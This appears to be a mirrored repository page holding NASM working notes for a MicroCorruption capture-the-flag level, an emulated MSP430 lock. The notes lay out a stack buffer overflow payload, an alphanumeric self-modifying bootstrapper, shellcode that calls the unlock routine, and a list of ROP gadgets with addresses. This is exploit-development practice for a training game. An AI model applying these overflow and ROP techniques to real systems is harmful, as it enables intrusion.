mirror of
https://git.soft.fish/val/MicroCorruption.git
synced 2024-11-23 00:06:03 +00:00
66 lines
1.1 KiB
NASM
66 lines
1.1 KiB
NASM
|
; Goal: execute code from 0x25b6
|
||
|
|
||
|
; stack buffer: 43ed
|
||
|
; mem buffer: 2400
|
||
|
|
||
|
passwordpassword1[retval][pcoffset]0[realfunc][padding]0[bootstrapper]
|
||
|
|
||
|
retval = 0x4430 ; &bootstrapper
|
||
|
pcoffset = 0x2443-0x4430 ; &realfunc - retval
|
||
|
padding = "A"*0x30 + "1" ; alignment
|
||
|
bootstrapper = subc @sp+, pc ; 3071
|
||
|
|
||
|
|
||
|
'passwordpassword1' + 'D0' + '??' + '0' + [realfunc][padding]0[bootstrapper]
|
||
|
|
||
|
bootstrapper:
|
||
|
add @sp+, r15
|
||
|
|
||
|
realfunc:
|
||
|
push #0x7f
|
||
|
call 45fc
|
||
|
|
||
|
3012 7e00 b012 fc45
|
||
|
|
||
|
; Step 1: Create a bootstrapper out of alphanumeric characters, and store it on the stack
|
||
|
; this instruction pops a value off the stack and subtracts it from pc. Perfect for
|
||
|
subc @sp+, pc
|
||
|
|
||
|
b'passwordpassword1'+(b'\x30\x71'*0x1a4)+b'00000000000000'
|
||
|
|
||
|
code snippets:
|
||
|
; pop to register
|
||
|
3n413041 ; nA0A
|
||
|
pop Rn
|
||
|
ret
|
||
|
|
||
|
; popadd to register
|
||
|
add @sp+, rN ; nq0A
|
||
|
ret
|
||
|
|
||
|
32413041 ; 2A0A
|
||
|
pop sr
|
||
|
ret
|
||
|
|
||
|
|
||
|
ROP gadgets:
|
||
|
|
||
|
Pop sr
|
||
|
|
||
|
|
||
|
Move byte relative to R4 into r15
|
||
|
4464 ("Dd"):
|
||
|
mov.b -0x4(r4), r15
|
||
|
sxt r15
|
||
|
add #0x8, sp
|
||
|
pop r4
|
||
|
ret
|
||
|
|
||
|
Pop r4:
|
||
|
446c ("Dl")
|
||
|
pop r4
|
||
|
ret
|
||
|
|
||
|
|
||
|
|
||
|
passwordpassword1DlDd
|